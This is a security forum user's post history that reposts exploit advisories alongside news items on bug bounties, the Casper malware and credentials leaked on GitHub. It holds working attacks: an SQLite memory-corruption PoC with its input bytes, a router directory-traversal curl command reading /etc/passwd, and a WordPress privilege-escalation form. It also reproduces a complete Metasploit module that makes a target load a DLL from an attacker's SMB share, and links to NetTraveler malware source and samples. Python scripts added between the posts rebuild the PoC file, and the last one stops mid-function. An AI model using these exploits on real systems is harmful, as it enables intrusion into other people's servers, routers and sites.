Everything posted by Aerosol
-
Tip:// maybe read before you post, too. uTorrent isn't to blame because you click Next, Next, Next without reading; very many programs do this, and very many programs WARN you, but since you're in a "hurry" to install it you don't read the Terms & Conditions, or whatever is written before you click Next. -If 100000 people use this program, that means I have no reason to check; I click Next, Next, Next and whatever happens, happens.
-
HP Data Protector 8.10 Remote Command Execution
Aerosol replied to Kalashnikov.'s topic in Exploituri
https://rstforums.com/forum/98250-hp-data-protector-8-10-remote-command-execution.rst It has already been posted, but it's good that you're getting involved anyway. Tip: when you post something that isn't yours, post the source too. The point is that it was posted before, not that you're beating me to it.
# Exploit Title: SQLite3 controlled memory corruption PoC (0day)
# Date: [date]
# Exploit Author: Andras Kabai
# Vendor Homepage: http://www.sqlite.org/
# Software Link: http://www.sqlite.org/download.html
# Version: 3.8.6, 3.8.8.3
# Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code)

Using a crafted input (e.g. from a malicious file via the "-init" parameter, or given directly on the program's standard input) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption can be controlled, therefore the program flow could be manipulated by the attacker. The following sections demonstrate the attack against the apt-get installed and updated sqlite3, and against a newer version that is built from source.

====
andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3
/usr/bin/sqlite3
andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version
3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e
andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) set args < sqlitepoc.txt
(gdb) r
Starting program: /usr/bin/sqlite3 < sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0
(gdb) i r
rax            0x138	312
rbx            0x41414141424242	18367622009733698
rcx            0x7fffffffb590	140737488336272
rdx            0x0	0
rsi            0x555555779b43	93824994483011
rdi            0x41414141424242	18367622009733698
rbp            0x555555779b43	0x555555779b43
rsp            0x7fffffffb4c0	0x7fffffffb4c0
r8             0x555555779b41	93824994483009
r9             0x6c	108
r10            0x0	0
r11            0x0	0
r12            0x555555779b48	93824994483016
r13            0x7fffffffb590	140737488336272
r14            0x555555779b40	93824994483008
r15            0x2	2
rip            0x7ffff7ba06a0	0x7ffff7ba06a0 <sqlite3_load_extension+736>
eflags         0x10246	[ PF ZF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa:
=> 0x00007ffff7ba06a0 <sqlite3_load_extension+736>:	call   QWORD PTR [rbx+0x48]
   0x00007ffff7ba06a3 <sqlite3_load_extension+739>:	mov    r15,rax
   0x00007ffff7ba06a6 <sqlite3_load_extension+742>:	lea    rax,[rip+0x12bc1]        # 0x7ffff7bb326e
End of assembler dump.

===
andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version
3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b
andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Reading symbols from ./lt-sqlite3...done.
(gdb) set disassembly-flavor intel
(gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt
(gdb) r
Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off

Program received signal SIGSEGV, Segmentation fault.
sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169
36169	}
(gdb) i r
rax            0x138	312
rbx            0x41414141424242	18367622009733698
rcx            0x7fffffffb510	140737488336144
rdx            0x0	0
rsi            0x6261c3	6447555
rdi            0x41414141424242	18367622009733698
rbp            0x6261c3	0x6261c3
rsp            0x7fffffffb440	0x7fffffffb440
r8             0x6261c1	6447553
r9             0x6c	108
r10            0x7fffffffb270	140737488335472
r11            0x7ffff7b5ae50	140737349267024
r12            0x6261c8	6447560
r13            0x7fffffffb510	140737488336144
r14            0x6261c0	6447552
r15            0x2	2
rip            0x7ffff7b5b130	0x7ffff7b5b130 <sqlite3_load_extension+736>
eflags         0x10246	[ PF ZF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a:
=> 0x00007ffff7b5b130 <sqlite3_load_extension+736>:	call   QWORD PTR [rbx+0x48]
   0x00007ffff7b5b133 <sqlite3_load_extension+739>:	mov    r15,rax
   0x00007ffff7b5b136 <sqlite3_load_extension+742>:	lea    rax,[rip+0x587d8]        # 0x7ffff7bb3915
End of assembler dump.

====
andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt
00000000  3b 0a 2e 74 20 78 0a 2e  74 0a 77 68 61 74 65 76  |;..t x..t.whatev|
00000010  65 72 00 0a 3b 0a 2e 74  0a 2e 6f 70 0a 2e 6c 20  |er..;..t..op..l |
00000020  43 43 43 43 42 42 42 42  41 41 41 41 0a           |CCCCBBBBAAAA.|
0000002d

Source
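The script below is an added example, not the advisory author's code. It rebuilds sqlitepoc.txt byte-for-byte from the hexdump -C listing (a small parser for that format, including the "*" repeat marker hexdump emits for longer files), and then reads the second gdb session back: db (0x6261c8) sits 5 bytes into the zFile string at 0x6261c3, so the first qword fetched through db is the string bytes "BBBAAAA\0", which is exactly rbx, and the call through [rbx+0x48] reads its target from 0x4141414142428a, which is why the process faults. Reading offset 0x48 as the xDlOpen slot of sqlite3_vfs on x86-64 is my assumption about the struct layout; the advisory does not say so.

```python
"""Added example: rebuild the PoC file from the advisory's hexdump and explain
the crash from the gdb register dump.  Not the advisory author's code."""

# hexdump -C listing copied from the advisory (sqlitepoc.txt, 0x2d bytes)
HEXDUMP_TEXT = """\
00000000  3b 0a 2e 74 20 78 0a 2e  74 0a 77 68 61 74 65 76  |;..t x..t.whatev|
00000010  65 72 00 0a 3b 0a 2e 74  0a 2e 6f 70 0a 2e 6c 20  |er..;..t..op..l |
00000020  43 43 43 43 42 42 42 42  41 41 41 41 0a           |CCCCBBBBAAAA.|
0000002d
"""

# Values from the second gdb session (sqlite3LoadExtension frame and `i r`)
ZFILE_ADDR = 0x6261C3
DB_ADDR = 0x6261C8
ZFILE_STR = b"CCCCBBBBAAAA\x00"
RBX = 0x41414141424242
# Assumption: [rbx+0x48] is sqlite3_vfs.xDlOpen on x86-64; the advisory does not say so.
XDLOPEN_OFFSET = 0x48


def parse_hexdump_c(text):
    """Turn `hexdump -C` output back into bytes, honouring the '*' repeat marker."""
    out = bytearray()
    prev = b""
    pending_repeat = False
    for raw in text.splitlines():
        line = raw.split("|", 1)[0].strip()   # drop the ASCII column
        if not line:
            continue
        if line == "*":                        # previous 16-byte line repeats
            pending_repeat = True
            continue
        tokens = line.split()
        offset = int(tokens[0], 16)
        if pending_repeat:
            gap = offset - len(out)
            if not prev or gap <= 0 or gap % len(prev):
                raise ValueError("bad '*' run before offset %#x" % offset)
            out.extend(prev * (gap // len(prev)))
            pending_repeat = False
        if offset != len(out):
            raise ValueError("offset %#x but %d bytes parsed" % (offset, len(out)))
        chunk = bytes(int(t, 16) for t in tokens[1:])
        out.extend(chunk)
        if chunk:
            prev = chunk
    return bytes(out)


def write_poc(path, text=HEXDUMP_TEXT):
    """Write the reconstructed PoC to disk; returns the byte count written."""
    data = parse_hexdump_c(text)
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


def explain_crash(zfile_addr=ZFILE_ADDR, db_addr=DB_ADDR, zfile=ZFILE_STR, rbx=RBX):
    """Return (offset of db inside zFile, the 8 bytes read as a pointer, faulting address)."""
    off = db_addr - zfile_addr
    qword = zfile[off:off + 8]
    if len(qword) != 8:
        raise ValueError("db does not point inside the file-name string")
    if int.from_bytes(qword, "little") != rbx:
        raise ValueError("rbx is not the qword at db; the pointer is not string-controlled")
    # call QWORD PTR [rbx+0x48]: the function pointer is fetched from attacker bytes
    return off, qword, rbx + XDLOPEN_OFFSET


if __name__ == "__main__":
    print("wrote", write_poc("sqlitepoc.txt"), "bytes")
    off, qword, fault = explain_crash()
    print("db = zFile+%d, *db = %r, call target read from %#x" % (off, qword, fault))
```

Feed the written file to `sqlite3 < sqlitepoc.txt` under gdb to reproduce the transcript above. Because the pointer that becomes rbx is copied straight out of the file name passed to `.l`, an attacker who can place a fake sqlite3_vfs at a chosen address controls the indirect call target, which is what "controlled" means in the advisory title.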
-
# Title : Sagem F@st 3304-V2 Directory Traversal Vulnerability
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested Router : Sagem F@st 3304-V2 (3304, other versions may also be affected)
# Date : 2015-03-01
# Author : Loudiyi Mohamed
# Contact : Loudiyi.2010@gmail.com
# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603

# Vulnerability description:

Sagem F@st is an ADSL router that uses a web management interface to change configuration settings. The router's web server is vulnerable to directory traversal, which allows reading arbitrary files by sending (URL-encoded) '../' sequences in the request path.

The vulnerability may be tested with the following command line:

curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd

Or directly from the browser:

http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp

Source
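The two request forms in the advisory are the same traversal, once plain and once with every slash encoded as %2f. The added example below (my code, not the advisory author's) shows why a filter on the raw request string is not enough, beside a resolver that percent-decodes to a fixpoint before looking for ".." segments. The document root "/www" is an assumption; the advisory does not name the router's web root.

```python
"""Added example (not from the advisory): a naive '../' filter on the raw path,
beside a decode-then-check resolver that rejects both payload forms."""

import posixpath
from urllib.parse import unquote

WEB_ROOT = "/www"   # assumed document root; the advisory does not name it

# The three request paths from the advisory
PAYLOADS = [
    "//../../../../../../../../../../etc/passwd",
    "/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    "/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp",
]


def naive_blocks(url_path):
    """A check on the raw path: catches the curl form, misses the %2f form."""
    return "../" in url_path


def safe_resolve(url_path, root=WEB_ROOT, max_rounds=3):
    """Percent-decode to a fixpoint, then refuse any '..' segment or NUL byte.

    Returns the filesystem path under root, or None when the request must be rejected.
    """
    decoded = url_path
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    else:
        return None                      # still changing after max_rounds: reject
    if "\x00" in decoded:
        return None
    # split on '/' only after decoding, so %2f cannot hide a separator
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    if ".." in segments:
        return None
    return posixpath.join(root, *segments) if segments else root


if __name__ == "__main__":
    for p in PAYLOADS:
        print("%-75s naive=%-5s safe=%s" % (p, naive_blocks(p), safe_resolve(p)))
    print(safe_resolve("/cgi-bin/status.html"))
```

`naive_blocks` is true for the curl form and false for the two browser forms, which is the gap the advisory's encoded URLs exploit; `safe_resolve` returns None for all three and a path under the root for ordinary requests.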
-
Adobe has launched a bug bounty program that hands out high-fives, not cash. The web application vulnerability disclosure program, announced today and launched last month, operates through HackerOne, which is used by the likes of Twitter, Yahoo!, and CloudFlare, some of which provide cash or other rewards to those who disclose security messes. Adobe's program seeks out common flaws in its online services, including cross-site scripting; privileged cross-site request forgery; server-side code execution; authentication or authorisation flaws; injection vulnerabilities; directory traversal; information disclosure; and significant security misconfiguration. "In recognition of the important role that independent security researchers play in keeping Adobe customers safe, today Adobe launches a web application vulnerability disclosure program on the HackerOne platform," wrote Adobe security program manager Pieter Ockers. "Bug hunters who identify a web application vulnerability in an Adobe online service or web property can now privately disclose the issue to Adobe while boosting their HackerOne reputation score." Hackers will need to be the first to report a flaw and offer Adobe "reasonable" time to fix it prior to public disclosure, Ockers says. Smaller vulnerabilities such as the following are excluded:

- Logout and other instances of low-severity cross-site request forgery
- Perceived issues with password reset links
- Missing HTTP security headers
- Missing cookie flags on non-sensitive cookies
- Clickjacking on static pages

The announcement comes as AirBnB this week launched its bug bounty on the popular HackerOne platform. Bug bounties work best when they offer cash, according to BugCrowd engineer Drew Sing. In vulnerability program guidelines published in July, he says money is the best incentive to encourage researchers to conduct more regular and intense testing of products and services. "A high priority security issue handled improperly could damage the reputation of the organisation ... the development, IT and communications team are all critical components to a successful program," Sing says. The managed bug service recommends that bounties be published in an obvious location on websites, preferably under the /security path, and sport a dedicated security contact who is well-briefed in handling disclosures. So why has Adobe decided street cred, not cash, is the way to go? Wags might wonder if the company's infamously porous products have so many bugs that a cash bounty could dent the bottom line. Source
-
France's spy agency has been fingered as the likely author of complex reconnaissance malware, researchers say. The Casper malware is one of a handful with links to the Babar spy program, which leaked NSA documents revealed last month to be the handiwork of France's Direction Générale de la Sécurité Extérieure (General Directorate for External Security, or DGSE). Babar emerged in 2009 and has since been used to steal keystrokes and clipboard contents and to listen in on Skype conversations, among other feats of interception. ESET malware analyst Joan Calvet says in a report on Casper that it appears to have been used as recently as April 2014 in actions against Syrian targets. "To attack their targets, Casper's operators used zero-day exploits in Adobe Flash, and these exploits were – surprisingly – hosted on a Syrian governmental website," Calvet says. "Casper is a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines." "These targets may have been the visitors of the jpic.gov.sy website — Syrian citizens who want to file a complaint. In this case they could have been redirected to the exploits from a legitimate page of this website." The Syrian website may have been used to store Casper's binaries and command-and-control components while concealing and misdirecting the identity of the attackers. Casper, analysed in a joint effort between malware researchers Marion Marschalek of Cyphort, Paul Rascagnères of GData, and security bods from the Computer Incident Response Center Luxembourg, could not be definitively pinned on France according to the technical analysis. But Calvet was able to obtain Casper samples through ESET's malware network and found they matched the Flash exploits that Kaspersky researcher Vyacheslav Zakorzhevsky reported were used on the site last April.

Casper is notable for its identification and evasion of specific versions of four anti-virus platforms, including BitDefender, PC Tools, and Avast, which it identifies on a target's Windows machine using the Windows Management Instrumentation facility. Calvet says this suggests the authors have "in-depth knowledge" of the way those anti-virus products work. The malware flees a target machine if such a product is detected, or injects code into a new process if the machine is found vulnerable, and receives instruction data from a now-offline command-and-control server, including the ability to deploy additional plugins. The research team found its payloads were very similar to those of the DGSE project researchers dub Animal Farm, under which Babar and the Bunny and NBOT malware were developed. "None of these signs alone is enough to establish a strong link but all the shared features together make us assess with high confidence that Bunny, Babar, NBOT and Casper were all developed by the same organisation," Calvet says. Kaspersky malware boffin Costin Raiu, who independently analysed Casper, told Motherboard the advanced Animal Farm hacking operation was likely the work of a nation state given the absence of financial gain. "When you have such a large-scale operation going on for several years using multiple zero-days without any kind of financial outcome," Raiu says, "it's obvious that it's nation-state sponsored — it has to be." Source
-
Dude, what you're saying is irrelevant (let's stop arresting criminals because, well, they kill 1 person, 2/3/100, and then they stop, right?). Try to think logically, it's something illegal (+ scammers aren't tolerated around here), and with that I've said it all. Off:// what does rep have to do with this?
-
# Exploit Title: WordPress Download Manager 2.7.2 Privilege Escalation
# Date: 24-11-2014
# Software Link: https://wordpress.org/plugins/download-manager/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9260

1. Description

Every registered user can update every WordPress option using the basic_settings() function.

    function basic_settings() {
        if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') {
            foreach ($_POST as $optn => $optv) {
                update_option($optn, $optv);
            }
            if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form');
            die('Settings Saved Successfully');
        }
        include('settings/basic.php');
    }

http://security.szurek.pl/wordpress-download-manager-272-privilege-escalation.html

2. Proof of Concept

Login as a standard user (created using wp-login.php?action=register), then:

    <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wdm_settings">
        <input type="hidden" name="task" value="wdm_save_settings">
        <input type="hidden" name="section" value="basic">
        <input type="hidden" name="default_role" value="administrator">
        <input type="submit" value="Hack!">
    </form>

After that, create a new user using wp-login.php?action=register. The newly created user will have admin privileges.

3. Solution:

Update to version 2.7.3

Source
-
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Nvidia Mental Ray Satellite Service Arbitrary DLL Injection',
      'Description'    => %q{
        The Nvidia Mental Ray Satellite Service listens for control commands on
        port 7414. When it receives the command to load a DLL (via an UNC path)
        it will try to connect back to the host on port 7514. If a TCP connection
        is successful it will then attempt to load the DLL. This module has been
        tested successfully on Win7 x64 with Nvidia Mental Ray Satellite Service
        v3.11.1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma', # Discovery
          'Donato Ferrante', # Discovery
          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
        ],
      'References'     =>
        [
          [ 'URL', 'http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf' ]
        ],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows x64', { 'Arch' => [ ARCH_X86_64 ] } ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Dec 10 2013',
      'DefaultTarget'  => 0))

    register_options([
      Opt::RPORT(7414),
      OptInt.new('LISTEN_PORT', [ true, 'The port to catch the return connection on', 7514]),
      OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
    ], self.class)

    deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
  end

  def primer
    self.file_contents = generate_payload_dll
    print_status("File available on #{unc}...")
    print_status("Trying to execute remote DLL...")
    send_exploit
  end

  def setup
    super
    # These lengths are required, although we specify the UNC path
    # length in the exploit, the header probably has another length
    # value we don't adjust.
    self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
    self.share = Rex::Text.rand_text_alpha(5)
  end

  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) { super }
    rescue Timeout::Error
      # do nothing... just finish exploit and stop smb server...
    end
  end

  def send_exploit
    # No idea what most of this hello is...
    hello = "6c72696d3030303030203030303031203136333932203037353134203030303031203039303936203030303030207261796d7"
    hello << "36734302d332e31312e312e345f5f5f5f5f5f5f5f5f5f5f5f0020007c5241593331317c53554231000100000000e90300000"
    hello << "0000000ffffffffffffffff1807000000000000dc10d7fdfe0700003018a40500000000e73654fffe070000c0afcd0000000"
    hello << "000ffffffffffffffffffffffffffffffff18070000000000007014a70100000000763754fffe0700000000000000000000f"
    hello << "035ae01000000003036ae0100000000da2152fffe0700003036ae0100000000a33754fffe070000000000000000000000000"
    hello << "00000000000ffffffffffffffffffffffffffffffff3036ae0100000000c40e53fffe0700007014a70100000000180700000"
    hello << "0000000000000000000000000000000000000000000000000000000020000000000000001000000000000005035440400000"
    hello << "0008013a7010000000090b3cd00000000001807000000000000b929d80300000000000000000000000018070000000000009"
    hello << "0b3cd000000000010cda701000000000000000000000000010100000000000000b3cd0000000000060000000000000066000"
    hello << "200000000000000020000000a0008000000a01a0fe73d00cf118ca300804034ae01000000000100000000000000000000000"
    hello << "0000000030000000a000000"
    hello = Rex::Text.hex_to_raw(hello)

    # Start of command - again no idea what this is...
    load_dll = Rex::Text.hex_to_raw("4ed32cb1740500000000000001130013")
    # Length of path string including null byte
    load_dll << [unc.length + 1].pack('V')
    # Data type?
    load_dll << [2].pack('V')
    # Assembly Load?
    load_dll << "AL"
    load_dll << unc << "\x00"
    # Some padding at the end...
    load_dll << rand_text_alpha(1386 - unc.length)

    # We have to start a second listening port although we dont actually care about
    # handling client connections. It appears as long as the service can make a
    # connection its happy and will move onto the DLL loading
    create_listen_port

    vprint_status("Connecting to target and sending commands")
    connect
    sock.put(hello)
    sock.put(load_dll)
    print_status("Instructed the service to load #{unc}...")
  end

  def create_listen_port
    port = datastore['LISTEN_PORT']
    comm = datastore['ListenerComm']
    if comm == "local"
      comm = ::Rex::Socket::Comm::Local
    else
      comm = nil
    end

    @listener = Rex::Socket::TcpServer.create(
      'LocalHost' => datastore['SRVHOST'],
      'LocalPort' => port,
      'Comm'      => comm,
      'Context'   =>
        {
          'Msf'        => framework,
          'MsfExploit' => self
        }
    )

    # Register callbacks
    @listener.on_client_connect_proc = proc { |cli|
      add_socket(cli)
      begin
        print_status("#{cli.peerhost.ljust(16)} #{shortname} - Connected to Listener on #{port}...")
      ensure
        # Need to close the socket for the SMB request to be
        # initiated...
        remove_socket(cli)
      end
    }

    @listener.start
    vprint_status("Started listening on TCP port #{port}")
  end

  def cleanup
    super
    return unless @listener
    begin
      @listener.deref if @listener.is_a?(Rex::Service)
      if @listener.is_a?(Rex::Socket)
        @listener.close
        @listener.stop
      end
      @listener = nil
    rescue ::Exception
    end
  end
end

Source
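One detail worth pulling out of the module: the path length field and the trailing padding trade off one for one, so the load-DLL command is always 16 + 4 + 4 + 2 + (len + 1) + (1386 - len) = 1413 bytes regardless of the UNC path, which matches the author's remark that "these lengths are required". The added example below (my code, not part of the module) serialises that command and parses it back, so the layout can be checked or matched in traffic to port 7414. The UNC path in the usage is made up.

```python
"""Added example (not from the module): build and parse the fixed-size load-DLL
command the Metasploit module sends, so its layout can be checked or matched on the wire."""

import struct

# 16-byte command prefix the module sends before the path fields (meaning unknown, as the module says)
LOAD_DLL_HEADER = bytes.fromhex("4ed32cb1740500000000000001130013")
PAD_BUDGET = 1386        # the module pads with rand_text_alpha(1386 - unc.length)
FIXED_TOTAL = 16 + 4 + 4 + 2 + 1 + PAD_BUDGET   # path bytes and padding trade off 1:1


def build_load_dll(unc, pad=b"A"):
    """Serialise the load-DLL command for a UNC path (e.g. \\\\host\\share\\x.dll)."""
    path = unc.encode("ascii")
    if len(path) > PAD_BUDGET:
        raise ValueError("UNC path longer than the padding budget")
    msg = bytearray(LOAD_DLL_HEADER)
    msg += struct.pack("<I", len(path) + 1)      # path length incl. NUL ('V' in Ruby)
    msg += struct.pack("<I", 2)                  # 'data type' field, constant 2
    msg += b"AL"                                 # 'assembly load' tag
    msg += path + b"\x00"
    msg += pad * (PAD_BUDGET - len(path))
    return bytes(msg)


def parse_load_dll(msg):
    """Recover the UNC path from a command; raises ValueError if the layout is wrong."""
    if len(msg) != FIXED_TOTAL or msg[:16] != LOAD_DLL_HEADER:
        raise ValueError("not a load-DLL command")
    path_len, dtype = struct.unpack_from("<II", msg, 16)
    if msg[24:26] != b"AL" or dtype != 2:
        raise ValueError("unexpected tag or type")
    path = msg[26:26 + path_len]
    if len(path) != path_len or not path.endswith(b"\x00"):
        raise ValueError("path length does not match")
    return path[:-1].decode("ascii")


def looks_like_load_dll(payload):
    """Cheap wire check for monitoring: prefix, tag and a UNC path starting with two backslashes."""
    try:
        return parse_load_dll(payload).startswith("\\\\")
    except ValueError:
        return False


if __name__ == "__main__":
    cmd = build_load_dll(r"\\192.0.2.5\share\payload.dll")   # made-up attacker share
    print(len(cmd), parse_load_dll(cmd), looks_like_load_dll(cmd))
```

The `hello` blob the module sends first is left out; it is opaque to the module author as well, and nothing in the load-DLL command depends on it.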
-
Happy birthday, mister.
-
Google Code project: https://code.google.com/p/open-nettraveler/
Git command: git clone https://code.google.com/p/open-nettraveler/

Kaspersky reports:
- http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf
- "NetTraveler is Running!" – Red Star APT Attacks Compromise High-Profile Victims - Securelist
- NetTraveler is back with new tricks | Kaspersky Lab

Malware samples: Download

More about CVE-2012-0158: https://securelist.com/analysis/publications/37158/the-curious-case-of-a-cve-2012-0158-exploit/
More about CVE-2010-3333: Targeted attacks against recently addressed Microsoft Office vulnerability (CVE-2010-3333/MS10-087) - Microsoft Malware Protection Center - Site Home - TechNet Blogs

Good luck!

All download links: http://pastebin.com/BM0X1i04

Source
-
Recent revelations that Uber stored a sensitive database key on a publicly accessible GitHub page generated its share of amazement and outrage. Some Ars readers called for the immediate termination of the employees responsible or for the enactment of new legal penalties for similar blunders in the future. Left out of the discussion was a point Ars first tried to drive home more than two years ago. To wit, GitHub and other public code repositories are awash with personal credentials posted by tens of thousands, or possibly even millions, of people, some of whom work for extremely sensitive organizations. A case in point is the set of GitHub entries that appear to include everything needed to log into many Secure File Transfer Protocol accounts. One GitHub search revealed almost 269,000 entries like the one pictured above, showing the domain name or IP address, username, and password needed to log in to each account. Similar searches generated almost two million entries for WordPress accounts. A quick scan of the results shows that many of them represent no security threat at all, since the password fields are blank or the credentials belong to non-existent accounts or to accounts that are accessible only to users already connected to the local network. But a mind-numbingly large percentage of the results appear to provide credentials for accounts on production servers. Whether the percentage is 33, 25, or even 10, it's way too high. It wouldn't be surprising if many of the credentials offered shell accounts that ran with highly privileged administrator rights. To protect the careless, this post won't reveal the specific search terms used, even though they are extremely easy for readers to figure out on their own or to find on Twitter, in blog posts, or in other venues.

As Ars has reported before, malicious hackers are increasingly favoring Web servers as the target of choice, since they offer more computing power and bandwidth compared to more traditionally targeted Windows-based desktops and laptops. Besides increased firepower for waging denial of service attacks, servers often can be used as beachheads to further penetrate company networks. It's hard to imagine criminals aren't already employing automated scripts that regularly trawl GitHub for credentials that can be used for this purpose. Who needs spear phishing and software or Web exploits when the login details are sitting in plain sight? For obvious legal reasons, Ars didn't test this hypothesis, but Uber's recent admission in court documents suggests it's by no means far-fetched. If a digital key unlocking a database storing driver license numbers of 50,000 Uber drivers can remain on GitHub for six months—as the subpoena Uber filed against GitHub strongly implied—there's no telling what other credentials belonging to other companies are being similarly siphoned up. Readers who are tempted to scoff at Uber's epic blunder have reason to do so. But let's not forget that the ride-sharing service is hardly alone, and this critical mass of carelessness makes the Internet less safe for everyone. Source
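The triage the article describes by hand (blank password: no threat; host only reachable on a local network: low; anything else: production candidate) is easy to automate once you commit to the two file shapes it names, an editor's SFTP config and a wp-config.php. The added example below is my code, not Ars's or anyone's published tool; the sample files are constructed and contain no real hosts or credentials, and it deliberately masks the password in its findings rather than copying it on.

```python
"""Added example (not from the article): a small scanner for the two credential
shapes the article describes, with the triage it applies to the results."""

import ipaddress
import re

# Constructed sample files; no real hosts or credentials.
SAMPLES = {
    "project/sftp-config.json": '{\n    "type": "sftp",\n    "host": "sftp.example-hosting.net",\n'
                                '    "user": "deploy",\n    "password": "Summer2015!",\n'
                                '    "remote_path": "/var/www"\n}\n',
    "site/wp-config.php": "<?php\ndefine('DB_NAME', 'wp_prod');\ndefine('DB_USER', 'wpadmin');\n"
                          "define('DB_PASSWORD', 'correct-horse-battery');\ndefine('DB_HOST', 'db.internal');\n",
    "demo/sftp-config.json": '{\n    "type": "sftp",\n    "host": "localhost",\n'
                             '    "user": "me",\n    "password": ""\n}\n',
    "lab/wp-config.php": "<?php\ndefine('DB_USER', 'root');\ndefine('DB_PASSWORD', 'root');\n"
                         "define('DB_HOST', '192.168.1.20');\n",
    "other/README.md": "No secrets here.\n",
}

SFTP_FIELD = re.compile(r'"(host|user|password)"\s*:\s*"([^"]*)"')
WP_DEFINE = re.compile(r"define\(\s*'DB_(USER|PASSWORD|HOST)'\s*,\s*'([^']*)'\s*\)")


def host_is_local(host):
    """True for loopback, RFC 1918 and link-local targets; a DNS name counts as reachable."""
    if host.strip().lower() in ("", "localhost"):
        return True
    try:
        ip = ipaddress.ip_address(host.strip())
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local


def triage(path, kind, host, user, password):
    """Apply the article's three buckets to one host/user/password triple."""
    if host is None or user is None or password is None:
        return None                      # not a complete triple, nothing to log in with
    if password == "":
        severity = "info"                # blank password: the article's "no threat" bucket
    elif host_is_local(host):
        severity = "low"                 # only reachable from inside that network
    else:
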